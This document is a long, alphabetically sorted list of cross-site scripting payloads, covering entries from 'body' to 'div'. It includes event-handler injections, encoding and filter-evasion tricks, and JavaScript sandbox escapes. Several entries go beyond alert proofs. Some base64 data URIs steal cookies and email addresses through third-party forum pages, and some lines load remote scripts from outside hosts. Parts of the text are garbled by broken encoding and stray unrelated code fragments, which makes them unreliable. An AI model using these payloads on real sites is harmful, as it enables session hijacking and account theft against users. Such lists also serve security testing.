- <body onpageshow=alert(1)>
- <body/onpageshow=alert(1)>
- <body onpageshow=alert(92)>
- <body onPageShow body onPageShow=”javascript:javascript:alert(1)”></body onPageShow>
- <body/onpageshow=confirm()>//
- <body onpageshow=top[‘ale’+’rt’]()>
- <body onPopState body onPopState=”javascript:javascript:alert(1)”></body onPopState>
- <body onPropertyChange body onPropertyChange=”javascript:javascript:alert(1)”></body onPropertyChange>
- <body onresize=alert(1)>
- <body onresize=alert(1)>press F12!
- <body onresize=alert(97)>press F12!
- <body onResize body onResize=”javascript:javascript:alert(1)”></body onResize>
- <body onscroll=alert(1)>
- <body onscroll=alert(1)><br><br><br><br>
- <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
- <body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body onscroll=alert(96)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
- <body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
- <body onscroll=javascript:alert(1)><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
- <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body onunload body onunload=”javascript:javascript:alert(1)”></body onunload>
- <body onUnload body onUnload=”javascript:javascript:alert(1)”></body onUnload>
- <body onunload=”javascript:alert(‘XSS’);”>
- <body rel=’popup=1;’onerror=popup=1; onload=x >
- <body><script>hash=location.hash.slice(1);document.body.innerHTML=decodeURIComponent(hash);</script></body>
- <body><script>hash=location.hash.slice(1);document.write(decodeURIComponent(hash));</script></body>
- <body scroll=confirm(1)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
- <body/s/onload=x={doc:parent.document};x.doc.writeln(1)
- <body src=1 href=1 onerror=”javascript:alert(1)”></body>
- <body style=”height:1000px” onwheel=”alert(1)”>
- <body style=”height:1000px” onwheel=”[DATA]”>
- <body style=”height:1000px” onwheel=”[JS-F**k Payload]”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[JS-F**k Payload]”>
- <body style=”height:1000px” onwheel=”prom%25%32%33%25%32%36x70;t(1)”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”prom%25%32%33%25%32%36x70;t(1)”>
- <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
- <body style=overflow:auto;height:1000px onscroll=alert(95) id=x>#x
- <body><svg><x><script>alert(1)</script></x></svg></body>
- <BODY(‘XSS’)>
- body{xss:expression(alert(��Xss��))}
- body{xss:expression(alert(Xss))}
- body{xss:expression(alert(Xss-By-Muhaddi))}
- body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))}
- <b onbeforescriptexecute=alert(185)>
- <bonbeforescriptexecute=prompt()>
- <b onclick=alert(1)>click me!
- “><b/onclick=”javascript:window.window.window[‘confirm’](1)”>bold
- bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
- <br><br><br><br><br><br><br><br><br><br>
- <br><br><br><br><br><br><x id=x>#x
- <;br size=\”;&;{alert('XSS')}\”;>;
- <br size=”&{alert(‘XkSS’)}”>
- <br size=”&{alert(‘XSS’)}”>
- <br size=”&{alert(‘XSS’)}”>
- <br size=\”&{alert(‘XSS’)}\”>
- <;BR SIZE=”;&;{alert(‘;XSS’;)}”;>;
- <BR SIZE=”&{alert(‘XSS’)}”>
- <BR SIZE=”&{alert(XSS)}”> (netspace)
- <BR SIZE=”&{confirm(‘XSS’)}”>
- <br SIZE=”&{document.vulnerable=true}”>
- <BR SIZE=”&{javascript:alert(1)}”>
- <;/br style=a:expression(alert())>;
- </br style=a:expression(alert())>
- </br style=a:expression(alert())>
- </br style=a:expression(alert(1))>
- <brute contenteditable onblur=alert(1)>lose focus!
- <brute contenteditable onfocus=alert(1)>focus this!
- <brute contenteditable oninput=alert(1)>input here!
- <brute contenteditable onkeydown=alert(1)>press any key!
- <brute contenteditable onkeypress=alert(1)>press any key!
- <brute contenteditable onkeyup=alert(1)>press any key!
- <brute contenteditable onpaste=alert(1)>paste here!
- //brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)
- //brutelogic.com.br/webgun/test.php?p=<body/onhashchange=alert(document.domain)>
- //brutelogic.com.br/webgun/test.php?p=<body/onresize=alert(document.domain)>
- //brutelogic.com.br/webgun/test.php?p=<svg/onload=eval(name)>&name=alert(document.domain)
- <brute onclick=alert(1)>clickme!
- <brute onclick=alert(1)>click this!
- <brute oncontextmenu=alert(1)>right click this!
- <brute oncopy=alert(1)>copy this!
- <brute oncut=alert(1)>copy this!
- <brute ondblclick=alert(1)>double click this!
- <brute ondrag=alert(1)>drag this!
- <brute onmousedown=alert(1)>click this!
- <brute onmousemove=alert(1)>hover this!
- <brute onmouseout=alert(1)>hover this!
- <brute onmouseover=alert(1)>hover this!
- <brute onmouseup=alert(1)>click this!
- <brute style=font-size:500px onmouseover=alert(1)>0000
- <brute style=font-size:500px onmouseover=alert(1)>0001
- <brute style=font-size:500px onmouseover=alert(1)>0002
- <brute style=font-size:500px onmouseover=alert(1)>0003
- <b <script>alert(1)</script>0
- <b <script>alert(1)//</script>0</script></b>
- <b “<script>alert(1)</script>”>hola</b>
- <b><script<b></b><alert(1)</script </b></b>
- <B=”<SCRIPT>confirm(1)</SCRIPT>”>
- <B <SCRIPT>confirm(1)</SCRIPT>>
- b={{set(‘_rootDataHost’,ownerdefaultView)}}
- [?=btoa][?`~)e`][?`OE’2UirU+`.split`1`[-~0]]`$${?`zoD`+”($)”}$``0${btoa(‘|o&|Y’).match(/[h-te]*/)+’(/’+btoa(‘n\x8a-3,’)+’/)’}`
- b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
- b=\”URL(\\”\”;
- <button autofocus onfocus=confirm(2)>
- <button autofocus=x onchange=’import’onfocus=popup=1; >
- <button data=popup=1; id=’x’onfocus=popup=1; >
- <button form=test onformchange=alert(1)>//INJECTX
- <button form=x>xss<form id=x action=”javas	cript:alert(1)”//
- <button>’><img src=x onerror=confirm(0);></button>
- “<button>’><img src=x onerror=confirm(0);></button>”
- <button ‘ onclick=alert(1)//>*/alert(1)//
- <button/onclick=alert(20)>M
- <button onclick=popup=1;>
- <button onclick=”window.open(‘http://xss.cx/::Error138 ‘);”>CLICKME
- <button onfocus=alert(1) autofocus>
- <button onmousemove=”javascript:alert(1)”>renwa
- <button><select%20name=xss><option>%26%23x000000003c;script%26%23x000000003e;alert(1)%26%23x000000003c;/script%26%23x000000003e;
- <button><select%20name=xss><option>%26%23x3c;script%26%23x3e;
- buttons.html(button.getAttribute(“data-text”));
- “><button><svg/onload=v=prompt;v(/XSS/.source);v(0)></button>
- $(“button”).val(“<iframe src=vbscript:confirm(1)>”)
- `<b\x20#x (click)=”x.inn\x65rHTML=’\x3ciframe onload=alert(1)\x3e’”>CLICK</b>`
- B+Z+J+W+O;
- c={{}}
- %c0��//(0000%0dconfirm(1)//
- “ = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
- ‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
- < = %C0%BC = %E0%80%BC = %F0%80%80%BC
- %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
- > = %C0%BE = %E0%80%BE = %F0%80%80%BE
- %c0u003cimg+src%3d1+onerror%3dalert(/xss/)+%c0u003e
- %c1;alert(/xss/);//
- c2=c.getContext(‘2d’);
- c2=c.getContext(2d);
- ? (%c4%b0).toLowerCase() => i
- ? (%c4%b1).toUpperCase() => I
- ? (%c5%bf) .toUpperCase() => S
- ‘ = %CA%B9
- “ = %CA%BA
- %CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
- %CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E
- %CA%BA%EF%BC%9E%EF%BC%9Csvg onload %EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
- ?callback=javascript:alert(1)”,
- callback({“name”:”[0xc0]\u003cimg src=1 onerror=alert(/xss/) [0xc0]\u003e”});
- callback({“name”:”u003cimg src=1 onerror=alert(/xss/) u003e”})
- ?callback=<script/src=?callback=alert(document.domain)//></script>
- <canvas onclick=”popup=1;”>
- Carriage Return Injected##<script%0Daaa>alert(1)</script%0Daaaa>
- \”))}catch(e){alert(1)}//
- \”));}catch(e){confirm(document.domain);}//
- \”));}catch(e){confirm(document.domain)}//
- ;\”))}catch(e) {confirm(document.location);}//
- ;\\”))}catch(e) {confirm(document.location);}//
- \”));}catch(e){x=window.open(‘http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//
- //@cc_on-alert(1))
- /*@cc_on-alert(1))
- <![CDATA”:
- <![CDATA[<h1>My HTML content</h1>]]>
- ![CDATA[<! — ]]<script>alert(‘XSS’);// →</script>
- <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
- <![CDATA[<script>confirm(document.domain)</script>]]>
- <![CDATA[<script>var n=0;while(true){n;}</script>]]>
- <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
- c=d.createElement(‘canvas’);
- c=d.createElement(canvas);
- <center><h1 id=’text’>Click here to XSS!</h1></center>
- charset=utf-
- charset=utf- 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
- charset=utf-8&v=><img src=x onerror=prompt(0);>
- charset=utf-8&v=��><img src=x onerror=prompt(0);>
- c.height=480;
- Chrome (Any character \x01 to \x20)
- chrome&jsonp=alert(1);
- Chrome: this[Object[“keys”](this)[146]](1)
- ‘`”><*chr*script>log(*num*)</script>
- <cite><a href=”javascript:confirm(1);”>XSS cited!</a></cite>
- c=\”javascript:\”;
- ```${``[class extends[alert``]{}]}```
- [class extends[alert````]{}]
- ,class extends[]/alert(1){}
- !class extends`${alert(1)}```{}
- class extends[]/alert(1){}
- class XSS {public static function main() {flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);}}
- [Click here](javascript:alert(1))
- ?clickTAG=javascript:alert(1)”,
- ?clickTAG=javascript:alert(1)&TargetAS=”,
- <code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
- Code Reuse Regular Script
- : = :
- [color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
- [color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
- [color=red width=expression(alert(123))][color]
- [color=red width=expression(alert(123))][color]
- <command onmouseover=”javascript:confirm(0);”>Save //
- <command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
- <command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
- <Command onmouseover=”\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B “> Save </ command>
- <comment><img src=”</comment><img src=x onerror=alert(1)//”>
- <comment><img src=”</comment><img src=x onerror=alert(1))//”>
- <comment><img src=”</comment><img src=x onerror=alert(/ourren_demo/)//”>
- <comment><img src=”</comment><img src=x onerror=javascript:alert(1))//”>
- Components.lookupMethod(self, ‘alert’)(1)
- Components.lookupMethod(self, ‘confirm’)(1)
- =confirm(1);>”;>
- -confirm(1)-
- ‘-/”/-confirm(1)//’
- ‘-confirm`1`-’
- “-confirm`1`-”
- \’);confirm(1);//
- \”;confirm(1);//
- +confirm(1) —
- +confirm(1)
- ��;confirm(1)//
- confirm(1)”.replace(/.+/,eval)//
- confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````;
- confirm(1)>>>/xss
- ‘+confirm(9)&&null==’
- confirm = co\u006efir\u006d
- Confirm = co\u006efir\u006d
- -(confirm)(document.domain)//
- \”;confirm(document.location);//
- confirm(document.location)
- confirm(document.selection.createRange().getBookmark())
- confirm(location.hostname)
- ‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;
- confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// —
- ‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// — </SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;confirm(String.fromCharCode(88,83,83))//\’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//\”;confirm(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- confirm(window.toStaticHTML(‘<base href=”http://xss.cx/"></base>'));
- confirm(window.toStaticHTML(‘<label style=”overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;” for=”submit”>Click’));
- confirm(window.toStaticHTML(‘<marquee>foo</marquee>’));
- “; ||confirm(‘XSS’) || “
- confirm(<xss>xs{[function::status]}s</xss>)
- [][?=’constructor’][?](‘alert(1)’)()
- [].constructor.constructor(‘alert(1)’)()
- [].constructor.constructor(“alert” + “(1)”)()
- [][‘constructor’][‘constructor’](‘alert(1)’)()
- {{constructor.constructor(‘alert(1)’)()}}
- ${‘’.constructor.constructor(‘alert(1)’)()}
- {{constructor.constructor(‘alert(1)’)()}} <div ng-app> {‘a’.constructor.fromCharCode=[].join; ‘a’.constructor[0]=’\u003ciframe onload=alert(/Backdoored/)\u003e’;}} </div> <div ng-app> {{‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)’)+’’}} </div> <script> onload=function(){document.write(String.fromCharCode(97));}</script> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(“XSS”)> <IMG “””> <SCRIPT> Alert (“XSS”) </ SCRIPT> “> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=jav..??..S’)> Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator ) <IMG SRC=jav..??..S’)> <IMG SRC=java..??..XSS’)> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC = “jav ascript: alert (‘XSS ‘ ) ; “ > <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)”> <script> z = ‘document.’ </ script> <script> z = z + ‘write (“‘ </ script> <script> z = z + ‘<script’ </ script> <script> z = z + ‘src = ht’ </ script> <script> z = z + ‘tp :/ / ww’ </ script> <script> z = z + ‘w.zoyzo’ </ script> <script> z = z + ‘. cn / 1.’ </ script> <script> z = z + ‘js> </ sc’ </ script> <script> z = z + ‘ript> “)’ </ script> <script> eval_r (z) </ script> perl-e ‘print “<IMG SRC=javascript:alert(“XSS”)>”;’> out perl-e ‘print “<SCRIPT> alert (“ XSS “) </ SCRIPT>”;’> out <IMG SRC=” javascript:alert(‘XSS’);”> <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> <BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert(“XSS”)> <SCRIPT/SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> << SCRIPT> alert (“XSS”) ;/ / << / SCRIPT> <SCRIPT SRC = http://3w.org/XSS/xss.js? <B> <SCRIPT SRC=//3w.org/XSS/xss.js> <IMG SRC = “javascript: alert (‘XSS’)” <iframe src=http://3w.org/XSS.html> <SCRIPT> A = / XSS / alert (a.source) </ SCRIPT> “; alert (‘XSS’) ;/ / </ TITLE> <SCRIPT> alert (“XSS”); </ SCRIPT> <INPUT SRC=”javascript:alert(‘XSS’);”> <BODY BACKGROUND=”javascript:alert(‘XSS’)”><BODY(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <BGSOUND SRC=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css"> <STYLE> Li {list-style-image: url (“javascript: alert (‘XSS’)”);} </ STYLE> <UL> <LI> XSS <IMG SRC=’vbscript:msgbox(“XSS”)’> </ STYLE> <UL> <LI> XSS %3Cscript%3Ealert(%22XSS%22)%3C/script%3E <script>alert(“XSS”)</script> <script>alert(“XSS”)</script> <script>alert(%34XSS%34)</script> <script>alert(‘XSS’)</script> callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)// javascript:alert(document.cookie);// ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=”javascript:alert(‘XSS’);”> <a onmouseover=”alert(document.cookie)”>xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a>
- constructor.constructor(“aler”+”t(3)”)();
- [][?=’constructor’][?](‘ert(‘.padStart(6,’al’).padEnd(8,’1)’))()
- ;[].constructor.prototype.join=function(){return’pwnd’};eval(‘alert(1)’)
- [][?=/constructor/.source][?](/alert(1)/.source)()
- [][?=/constructor/.source][?](/alert(1)/.source)()for(n in{constructor:0})[][?=n][?](/alert(1)/.source)())
- <% contenteditable onresize=alert(1)>
- continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;
- <ControllerColor>C0C0C0</ControllerColor>
- # credit to rsnake
- →cript:alert(‘XSS’)”></B></I></XML> <SPAN DATASRC=”#xss” DATAFLD=”B”
- <cta id=ANSES actionType=download data=javascript://adobe.com%0aalert(document.domain)><![CDATA[ CLICK HERE ]]></cta>
- {{c=toString.constructor;p=c.prototype;p.toString=p.call;[“a”,”alert(1)”].sort(c)}}
- ctx.call(“fun”)
- ctx.eval(‘1+1’)
- ctx.eval(“var fun = () => ({ foo: 1 });”)
- ctx = py_mini_racer.MiniRacer()
- c.width=500;x.font=’9em”’for(i=3;i — ;x.fillText(T[0]+T[1]+T[2],40,200))t%6<i+2?T[i]=[…’’][(i*t+9*t|0)%5]:S
- c.width=640;
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- d=0||’une’+’scape’||0;a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n’||0;c=b[a];d=c(d);c(d(c(b)))
- #d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
- d=\”alert(‘XSS’);\\”)\”;
- .data
- data:%2f%2f;ba se64;;//,P HNjcmlw dD5hbG VydC gxKTwvc2NyaXB0Pg= =
- DATAFORMATAS=”HTML”></SPAN>
- <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*=”customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
- <*datahtmlelements* *dataevents*=”javascript:parent.customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
- <*datahtmlelements* *datahtmlattributes*=”javascript:parent.customLog(‘*datahtmlelements* *datahtmlattributes*’)”></*datahtmlelements*>
- data:[<MIME-type>][;charset=<encoding>][;base64],<data>
- data:),<script>alert(1)</script>
- data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))>
- data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
- data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah
- data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
- data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cCc7aS5zcmMrPWRvY3VtZW50LnJlZmVycmVyLmxlbmd0aD8nJzoncyc7aS5zcmMrPSc6Ly9mb3J1bS5hbnRpY2hhdC5ydS9jc3MvYS5jc3MnO2kub25sb2FkPWZ1bmN0aW9uKCl7YSgpfTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGkpfTwvc2NyaXB0Pjxib2R5IG9ubG9hZD1iKCk+
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cHM6Ly9yZG90Lm9yZy9mb3J1bS9jbGllbnRzY3JpcHQvdmJ1bGxldGluX3JlYWRfbWFya2VyLmpzJztpLm9ubG9hZD1mdW5jdGlvbigpe2EoKX07ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YigpPg==
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHAnKyhkb2N1bWVudC5yZWZlcnJlci5sZW5ndGggPyAnJyA6ICdzJykrJzovL2ZvcnVtLmFudGljaGF0LnJ1L3Byb2ZpbGUucGhwP2RvPWVkaXRwYXNzd29yZCcsZmFsc2UpO3guc2VuZChudWxsKTthbGVydCh4LnJlc3BvbnNlVGV4dC5tYXRjaCgvbmFtZT0iZW1haWwiIHZhbHVlPSIoLis/KSIvKVsxXSl9PC9zY3JpcHQ+PGJvZHkgb25sb2FkPWEoKT4=
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHBzOi8vcmRvdC5vcmcvZm9ydW0vcHJvZmlsZS5waHA/ZG89ZWRpdHBhc3N3b3JkJyxmYWxzZSk7eC5zZW5kKG51bGwpO2FsZXJ0KHgucmVzcG9uc2VUZXh0Lm1hdGNoKC9uYW1lPSJlbWFpbCIgdmFsdWU9IiguKz8pIi8pWzFdKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YSgpPg==
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZWxzZXthbGVydChkb2N1bWVudC5kb21haW4pfTwvc2NyaXB0Pg==
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
- data:text/html;charset=utf-8,<h1>abc
- data:text/html,<iframe src=javascript:alert(1)>
- data:text/html,<img src=1 onerror=alert(1)>
- #data:text/html,<img src=1 onerror=alert(document.domain)
- data:text/html,/*<img src=x ‘-alert(1)-’ onerror=alert(1)>*/alert(1)
- data:text/html,/*<img src=x ‘-confirm(1)-’ onerror=confirm(1)>*/confirm(1)
- data:text/html,<script>alert(0)</script>
- data:text/html,< sc r i p t >alert(1)</sc r ip t>
- data:text/html,<script>alert(1)</script>//
- data:text/html,<script>alert(1)</script>
- data:text/html,<script>confirm(0);confirm(1);location.reload();</script>
- data:text/html,<svg onload=alert(1)>
- data:text/html,<svg onload=alert(/@irsdl/)></svg>
- data://text/javascript,alert(‘xss’)
- Data URl
- d.body.appendChild(z)
- d.body.appendChild(z)},0)>
- d=document;
- _.defer(alert, 9)
- .__defineGetter__.constructor(‘[].constructor.
- defineSetter(‘x’,confirm); x=1;
- _.delay(alert, 0, 9)
- delete~[a=confirm]/delete a(1)
- delete [a=confirm],delete a(1)
- delete confirm(1)
- delete [][‘__proto__’][‘toString’];[][‘__proto__’][Symbol.toStringTag]=’=alert(1)’;eval([1,2,3]+’’);
- delFeedback(‘')alert(1)’
- <details onfocus = “alert(1)”>
- <details ontoggle=alert(1)>
- <details ontoggle=”aler\u0074(1)”>
- “><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
- <details open ontoggle=”alert(1)”>
- <details open ontoggle=alert(1)>
- <details/open/ontoggle=”alert`1`”>
- ><detials ontoggle=confirm(0)>
- ��><detials ontoggle=confirm(0)>
- <dialog open=”” onclose=”alert(1)”><form
- <dialog open=”” onclose=”alert(1)”><form method=”dialog”><button>Close me!</button></form></dialog>
- display:block;color:transparent;
- <div>
- <div%20id=a%20style=float:left%20onfocus=alert(1)>#a
- <div%20id=”a”%20style=-ms-block-progression:bt%20onfocus=alert(1)>#a
- <div%20id=a%20style=-ms-layout-flow:vertical-ideographic%20onfocus=alert(1)>#a
- <div%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x>#x
- <%div%20style=xss:expression(prompt(1))>
- <DIV><A></A>
- <div> <a href=/**/alert(15)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
- <div> <a href=/**/alert(1)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
- <div>`-alert(1)</script><script>`</div>
- <div>`-alert(4)</script><script>`</div>
- <div><base href=//cors.l0.cm/</div><script src=/test.js></script>
- <div><base href=//evil/</div>
- <div><base href=//evil/ </div>
- <div><base href=”javascript:/”><a href=/**/alert(1)>XSS</a></div>
- <div><base href=”javascript:\”><a href=/**/alert(1)>XSS</a></div>
- <div><base/href=javascript:/><a href=/*’”+-/%~.,()^&$#@!*/alert(1)>XSS</a></div>
- <div class=”qm_left” style=”position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=’//xss.tw/2180',sizingMethod=’scale’);width:40px;height:40px;”>
- <div contenteditable onresize=”alert(1)”></div>
- <div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
- <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”alert(1)”>
- <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[DATA]”>
- div data-bind=”foo: “ /div
- div data-bind=”html:’hello bworld /b’” /div
- div data-bind=”html:’ script src=”//evil.com” /script’” /div
- div data-bind=”value:’hello world’”?/div
- div data-dojo-type=”dijit/Declaration”data-dojo-props=”} — {“
- <div datafld=”b” dataformatas=”html” dataid=XSS SRC=”#XSS”></div>
- <div datafld=”b” dataformatas=”html” datasrc=”#X”></div>
- div data-role=”button”data-text=”I am a button” /div
- div data-role=”button”data-text=” script /script” /div
- div data-role=popup id=’ — script /script’?/div
- div data-toggle=tooltip data-html=true title=’script /script’ /div
